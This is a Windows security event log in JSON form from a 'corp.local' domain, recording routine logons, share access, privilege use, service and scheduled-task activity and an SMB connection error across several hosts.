WinEvents.log

{"EventTime":"2021-10-02T18:58:47.573161+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5140,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12808,"OpcodeValue":0,"RecordNumber":190902235,"ExecutionProcessID":4,"ExecutionThreadID":236,"Channel":"Security","Message":"A network share object was accessed.\r\n\t\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1140\r\n\tAccount Name:\t\tIT03$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x66A874A\r\n\r\nNetwork Information:\t\r\n\tObject Type:\t\tFile\r\n\tSource Address:\t\t192.168.2.108\r\n\tSource Port:\t\t10596\r\n\t\r\nShare Information:\r\n\tShare Name:\t\t\\\\*\\IPC$\r\n\tShare Path:\t\t\r\n\r\nAccess Request Information:\r\n\tAccess Mask:\t\t0x1\r\n\tAccesses:\t\tReadData (or ListDirectory)\r\n\t\t\t\t\r\n","Category":"File Share","Opcode":"Info","SubjectUserSid":"S-1-5-21-2569713578-3403938347-3732993993-1140","SubjectUserName":"IT03$","SubjectDomainName":"CORP","SubjectLogonId":"0x66a874a","ObjectType":"File","IpAddress":"192.168.2.108","IpPort":"10596","ShareName":"\\\\*\\IPC$","AccessMask":"0x1","AccessList":"%%4416\r\n\t\t\t\t","EventReceivedTime":"2021-10-02T18:58:48.651328+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:57:15.277442+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5145,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12811,"OpcodeValue":0,"RecordNumber":190902218,"ExecutionProcessID":512,"ExecutionThreadID":520,"Channel":"Security","Message":"A network share object was checked to see whether client can be granted desired access.\r\n\t\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tDC01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x66A2581\r\n\r\nNetwork Information:\t\r\n\tObject Type:\t\tFile\r\n\tSource Address:\t\t::1\r\n\tSource Port:\t\t50925\r\n\t\r\nShare Information:\r\n\tShare Name:\t\t\\\\*\\SYSVOL\r\n\tShare Path:\t\t\\??\\C:\\Windows\\SYSVOL\\sysvol\r\n\tRelative Target Name:\tcorp.local\\Policies\\{EE3A026B-45D4-4CF6-BD72-8E4DE6BF6FD0}\\Machine\\Preferences\\Services\\Services.xml\r\n\r\nAccess Request Information:\r\n\tAccess Mask:\t\t0x120089\r\n\tAccesses:\t\tREAD_CONTROL\r\n\t\t\t\tSYNCHRONIZE\r\n\t\t\t\tReadData (or ListDirectory)\r\n\t\t\t\tReadEA\r\n\t\t\t\tReadAttributes\r\n\t\t\t\t\r\nAccess Check Results:\r\n\tREAD_CONTROL:\tGranted by Ownership\r\n\t\t\t\tSYNCHRONIZE:\tGranted by\tD:(A;;0x1200a9;;;WD)\r\n\t\t\t\tReadData (or ListDirectory):\tGranted by\tD:(A;;0x1200a9;;;WD)\r\n\t\t\t\tReadEA:\tGranted by\tD:(A;;0x1200a9;;;WD)\r\n\t\t\t\tReadAttributes:\tGranted by\tD:(A;;0x1200a9;;;WD)\r\n\t\t\t\t\r\n","Category":"Detailed File Share","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"DC01$","SubjectDomainName":"CORP","SubjectLogonId":"0x66a2581","ObjectType":"File","IpAddress":"::1","IpPort":"50925","ShareName":"\\\\*\\SYSVOL","ShareLocalPath":"\\??\\C:\\Windows\\SYSVOL\\sysvol","RelativeTargetName":"corp.local\\Policies\\{EE3A026B-45D4-4CF6-BD72-8E4DE6BF6FD0}\\Machine\\Preferences\\Services\\Services.xml","AccessMask":"0x120089","AccessList":"%%1538\r\n\t\t\t\t%%1541\r\n\t\t\t\t%%4416\r\n\t\t\t\t%%4419\r\n\t\t\t\t%%4423\r\n\t\t\t\t","AccessReason":"%%1538:\t%%1804\r\n\t\t\t\t%%1541:\t%%1801\tD:(A;;0x1200a9;;;WD)\r\n\t\t\t\t%%4416:\t%%1801\tD:(A;;0x1200a9;;;WD)\r\n\t\t\t\t%%4419:\t%%1801\tD:(A;;0x1200a9;;;WD)\r\n\t\t\t\t%%4423:\t%%1801\tD:(A;;0x1200a9;;;WD)\r\n\t\t\t\t","EventReceivedTime":"2021-10-02T18:57:15.636865+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:59:05.463675+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12548,"OpcodeValue":0,"RecordNumber":190902236,"ExecutionProcessID":512,"ExecutionThreadID":3308,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tDC01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x66A8B6B\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"DC01$","SubjectDomainName":"CORP","SubjectLogonId":"0x66a8b6b","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2021-10-02T18:59:06.869864+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:59:05.463675+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12544,"OpcodeValue":0,"RecordNumber":190902237,"ExecutionProcessID":512,"ExecutionThreadID":3308,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Type:\t\t\t3\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tDC01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x66A8B6B\r\n\tLogon GUID:\t\t{3C070CCE-4BCE-4089-18CA-DED9A0C4933A}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t\r\n\tSource Network Address:\t127.0.0.1\r\n\tSource Port:\t\t50937\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"DC01$","TargetDomainName":"CORP","TargetLogonId":"0x66a8b6b","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","LogonGuid":"{3C070CCE-4BCE-4089-18CA-DED9A0C4933A}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessId":"0x0","ProcessName":"-","IpAddress":"127.0.0.1","IpPort":"50937","ImpersonationLevel":"%%1833","EventReceivedTime":"2021-10-02T18:59:06.869864+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:58:55.314065+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4670,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13570,"OpcodeValue":0,"RecordNumber":18995507,"ExecutionProcessID":4,"ExecutionThreadID":10020,"Channel":"Security","Message":"Permissions on an object were changed.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT02$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nObject:\r\n\tObject Server:\tSecurity\r\n\tObject Type:\tToken\r\n\tObject Name:\t-\r\n\tHandle ID:\t0xaa0\r\n\r\nProcess:\r\n\tProcess ID:\t0x2c0\r\n\tProcess Name:\tC:\\Windows\\System32\\services.exe\r\n\r\nPermissions Change:\r\n\tOriginal Security Descriptor:\tD:(A;;GA;;;SY)(A;;GA;;;LS)\r\n\tNew Security Descriptor:\tD:(A;;GA;;;SY)(A;;RC;;;OW)(A;;GA;;;S-1-5-80-2455429942-3131183193-3617688776-595395669-3772047725)","Category":"Authorization Policy Change","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT02$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ObjectServer":"Security","ObjectType":"Token","ObjectName":"-","HandleId":"0xaa0","OldSd":"D:(A;;GA;;;SY)(A;;GA;;;LS)","NewSd":"D:(A;;GA;;;SY)(A;;RC;;;OW)(A;;GA;;;S-1-5-80-2455429942-3131183193-3617688776-595395669-3772047725)","ProcessId":"0x2c0","ProcessName":"C:\\Windows\\System32\\services.exe","EventReceivedTime":"2021-10-02T18:58:57.313105+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:58:34.588995+05:45","Hostname":"DC01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5857,"SourceName":"Microsoft-Windows-WMI-Activity","ProviderGuid":"{1418EF04-B0B4-4623-BF7E-D74AB47BBDAA}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":513502,"ExecutionProcessID":5108,"ExecutionThreadID":2264,"Channel":"Microsoft-Windows-WMI-Activity/Operational","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"WmiPerfInst provider started with result code 0x0. HostProcess = wmiprvse.exe; ProcessID = 5108; ProviderPath = C:\\Windows\\System32\\wbem\\WmiPerfInst.dll","Opcode":"Info","UserData":"<Operation_StartedOperational xmlns='http://manifests.microsoft.com/win/2006/windows/WMI'><ProviderName>WmiPerfInst</ProviderName><Code>0x0</Code><HostProcess>wmiprvse.exe</HostProcess><ProcessID>5108</ProcessID><ProviderPath>C:\\Windows\\System32\\wbem\\WmiPerfInst.dll</ProviderPath></Operation_StartedOperational>","EventReceivedTime":"2021-10-02T18:58:36.510818+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:58:55.322103+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4688,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"TaskValue":13312,"OpcodeValue":0,"RecordNumber":18995508,"ExecutionProcessID":4,"ExecutionThreadID":7816,"Channel":"Security","Message":"A new process has been created.\r\n\r\nCreator Subject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT02$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nTarget Subject:\r\n\tSecurity ID:\t\tS-1-5-19\r\n\tAccount Name:\t\tLOCAL SERVICE\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E5\r\n\r\nProcess Information:\r\n\tNew Process ID:\t\t0x134c\r\n\tNew Process Name:\tC:\\Windows\\System32\\svchost.exe\r\n\tToken Elevation Type:\t%%1936\r\n\tMandatory Label:\t\tS-1-16-16384\r\n\tCreator Process ID:\t0x2c0\r\n\tCreator Process Name:\tC:\\Windows\\System32\\services.exe\r\n\tProcess Command Line:\tC:\\Windows\\system32\\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc\r\n\r\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\r\n\r\nType 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\r\n\r\nType 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\r\n\r\nType 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.","Category":"Process Creation","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT02$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","NewProcessId":"0x134c","NewProcessName":"C:\\Windows\\System32\\svchost.exe","TokenElevationType":"%%1936","ProcessId":"0x2c0","CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc","TargetUserSid":"S-1-5-19","TargetUserName":"LOCAL SERVICE","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e5","ParentProcessName":"C:\\Windows\\System32\\services.exe","MandatoryLabel":"S-1-16-16384","EventReceivedTime":"2021-10-02T18:58:57.313105+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:58:54.175101+05:45","Hostname":"IT03.corp.local","Keywords":"9259400833873739776","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":111250,"ExecutionProcessID":612,"ExecutionThreadID":4656,"Channel":"System","Message":"The Background Intelligent Transfer Service service entered the stopped state.","param1":"Background Intelligent Transfer Service","param2":"stopped","EventReceivedTime":"2021-10-02T18:58:55.737674+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:57:15.308683+05:45","Hostname":"DC01.corp.local","Keywords":"9227875636482146304","EventType":"AUDIT_FAILURE","SeverityValue":4,"Severity":"ERROR","EventID":4674,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13056,"OpcodeValue":0,"RecordNumber":190902221,"ExecutionProcessID":512,"ExecutionThreadID":520,"Channel":"Security","Message":"An operation was attempted on a privileged object.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-19\r\n\tAccount Name:\t\tLOCAL SERVICE\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E5\r\n\r\nObject:\r\n\tObject Server:\tLSA\r\n\tObject Type:\t-\r\n\tObject Name:\t-\r\n\tObject Handle:\t0x0\r\n\r\nProcess Information:\r\n\tProcess ID:\t0x200\r\n\tProcess Name:\tC:\\Windows\\System32\\lsass.exe\r\n\r\nRequested Operation:\r\n\tDesired Access:\t16777216\r\n\tPrivileges:\t\tSeSecurityPrivilege","Category":"Sensitive Privilege Use","Opcode":"Info","SubjectUserSid":"S-1-5-19","SubjectUserName":"LOCAL SERVICE","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e5","ObjectServer":"LSA","ObjectType":"-","ObjectName":"-","HandleId":"0x0","AccessMask":"16777216","PrivilegeList":"SeSecurityPrivilege","ProcessId":"0x200","ProcessName":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2021-10-02T18:57:15.636865+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:52:08.111016+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5379,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13824,"OpcodeValue":0,"RecordNumber":896629,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":740,"Channel":"Security","Message":"Credential Manager credentials were read.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tACC01$\r\n\tAccount Domain:\t\tPROD\r\n\tLogon ID:\t\t0x3E7\r\n\tRead Operation:\t\tEnumerate Credentials\r\n\r\nThis event occurs when a user performs a read operation on stored credentials in Credential Manager.","Category":"User Account Management","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"ACC01$","SubjectDomainName":"PROD","SubjectLogonId":"0x3e7","TargetName":"WindowsLive:(cert):name=02juitxxyrjocuia;serviceuri=*","Type":"0","CountOfCredentialsReturned":"0","ReadOperation":"%%8100","ReturnCode":"3221226021","ProcessCreationTime":"2021-09-21T07:15:23.0155705Z","ClientProcessId":"540","EventReceivedTime":"2021-10-02T18:52:09.141871+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:58:00.353891+05:45","Hostname":"IT03.corp.local","Keywords":"9227875636482146304","EventType":"AUDIT_FAILURE","SeverityValue":4,"Severity":"ERROR","EventID":4673,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13056,"OpcodeValue":0,"RecordNumber":40730163,"ExecutionProcessID":4,"ExecutionThreadID":4616,"Channel":"Security","Message":"A privileged service was called.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-3281079745-558096271-899791025-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tIT03\r\n\tLogon ID:\t\t0x7052B4\r\n\r\nService:\r\n\tServer:\tSecurity\r\n\tService Name:\t-\r\n\r\nProcess:\r\n\tProcess ID:\t0x15d0\r\n\tProcess Name:\tC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\r\n\r\nService Request Information:\r\n\tPrivileges:\t\tSeTcbPrivilege","Category":"Sensitive Privilege Use","Opcode":"Info","SubjectUserSid":"S-1-5-21-3281079745-558096271-899791025-500","SubjectUserName":"Administrator","SubjectDomainName":"IT03","SubjectLogonId":"0x7052b4","ObjectServer":"Security","Service":"-","PrivilegeList":"SeTcbPrivilege","ProcessId":"0x15d0","ProcessName":"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe","EventReceivedTime":"2021-10-02T18:58:01.377759+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:50:17.695331+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4702,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12804,"OpcodeValue":0,"RecordNumber":896627,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":3856,"Channel":"Security","Message":"A scheduled task was updated.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tACC01$\r\n\tAccount Domain:\t\tPROD\r\n\tLogon ID:\t\t0x3E7\r\n\r\nTask Information:\r\n\tTask Name: \t\t\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start\r\n\tTask New Content: \t\t<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.4\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>Microsoft Corporation.</Source>\r\n    <Author>Microsoft Corporation.</Author>\r\n    <Description>This task is used to start the Windows Update service when needed to perform scheduled operations such as scans.</Description>\r\n    <URI>\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <StartBoundary>2021-10-03T07:16:51Z</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT1M</RandomDelay>\r\n    </TimeTrigger>\r\n    <SessionStateChangeTrigger>\r\n      <Enabled>false</Enabled>\r\n      <StateChange>ConsoleDisconnect</StateChange>\r\n    </SessionStateChangeTrigger>\r\n    <SessionStateChangeTrigger>\r\n      <Enabled>false</Enabled>\r\n      <StateChange>RemoteDisconnect</StateChange>\r\n    </SessionStateChangeTrigger>\r\n    <WnfStateChangeTrigger>\r\n      <Enabled>false</Enabled>\r\n      <StateName>7508BCA3380C960C</StateName>\r\n      <Data>01</Data>\r\n      <DataOffset>0</DataOffset>\r\n    </WnfStateChangeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <UserId>NT AUTHORITY\\SYSTEM</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>C:\\WINDOWS\\system32\\sc.exe</Command>\r\n      <Arguments>start wuauserv</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>\r\n\r\nOther Information:\r\n\tProcessCreationTime: \t\t3940649673949203\r\n\tClientProcessId: \t\t\t540\r\n\tParentProcessId: \t\t\t632\r\n\tFQDN: \t\t0\r\n\t","Category":"Other Object Access Events","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"ACC01$","SubjectDomainName":"PROD","SubjectLogonId":"0x3e7","TaskName":"\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start","TaskContentNew":"<?xml version=\"1.0\" encoding=\"UTF-16\"?>\n<Task version=\"1.4\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\n  <RegistrationInfo>\n    <Source>Microsoft Corporation.</Source>\n    <Author>Microsoft Corporation.</Author>\n    <Description>This task is used to start the Windows Update service when needed to perform scheduled operations such as scans.</Description>\n    <URI>\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start</URI>\n  </RegistrationInfo>\n  <Triggers>\n    <TimeTrigger>\n      <StartBoundary>2021-10-03T07:16:51Z</StartBoundary>\n      <Enabled>true</Enabled>\n      <RandomDelay>PT1M</RandomDelay>\n    </TimeTrigger>\n    <SessionStateChangeTrigger>\n      <Enabled>false</Enabled>\n      <StateChange>ConsoleDisconnect</StateChange>\n    </SessionStateChangeTrigger>\n    <SessionStateChangeTrigger>\n      <Enabled>false</Enabled>\n      <StateChange>RemoteDisconnect</StateChange>\n    </SessionStateChangeTrigger>\n    <WnfStateChangeTrigger>\n      <Enabled>false</Enabled>\n      <StateName>7508BCA3380C960C</StateName>\n      <Data>01</Data>\n      <DataOffset>0</DataOffset>\n    </WnfStateChangeTrigger>\n  </Triggers>\n  <Principals>\n    <Principal id=\"LocalSystem\">\n      <RunLevel>LeastPrivilege</RunLevel>\n      <UserId>NT AUTHORITY\\SYSTEM</UserId>\n    </Principal>\n  </Principals>\n  <Settings>\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\n    <AllowHardTerminate>true</AllowHardTerminate>\n    <StartWhenAvailable>true</StartWhenAvailable>\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\n    <IdleSettings>\n      <Duration>PT10M</Duration>\n      <WaitTimeout>PT1H</WaitTimeout>\n      <StopOnIdleEnd>true</StopOnIdleEnd>\n      <RestartOnIdle>false</RestartOnIdle>\n    </IdleSettings>\n    <AllowStartOnDemand>false</AllowStartOnDemand>\n    <Enabled>true</Enabled>\n    <Hidden>false</Hidden>\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\n    <WakeToRun>false</WakeToRun>\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\n    <Priority>7</Priority>\n  </Settings>\n  <Actions Context=\"LocalSystem\">\n    <Exec>\n      <Command>C:\\WINDOWS\\system32\\sc.exe</Command>\n      <Arguments>start wuauserv</Arguments>\n    </Exec>\n  </Actions>\n</Task>","ClientProcessStartKey":"3940649673949203","ClientProcessId":"540","ParentProcessId":"632","RpcCallClientLocality":"0","FQDN":"ACC01.prod.corp.local","EventReceivedTime":"2021-10-02T18:50:19.344000+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T05:58:39.230948+05:45","Hostname":"DC01.corp.local","Keywords":"288230376151711808","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":30803,"SourceName":"Microsoft-Windows-SMBClient","ProviderGuid":"{988C59C5-0A1C-45B6-A555-0C62276E327D}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":1295,"ExecutionProcessID":4,"ExecutionThreadID":2020,"Channel":"Microsoft-Windows-SmbClient/Connectivity","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The network connection failed.\r\n\r\nError: The I/O request was canceled.\r\n\r\nServer name: corp.local\r\nServer address: 192.168.2.89:445\r\nConnection type: Wsk\r\n\r\nGuidance:\r\nThis indicates a problem with the underlying network or transport, such as with TCP/IP, and not with SMB. A firewall that blocks port 445 or 5445 can also cause this issue.","Opcode":"Info","Reason":"4","Status":"3221225760","ServerNameLength":"19","ServerName":"corp.local","AddressLength":"16","Address":"020001BDC0A802590000000000000000","ConnectionType":"1","EventReceivedTime":"2021-10-02T05:58:40.277568+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
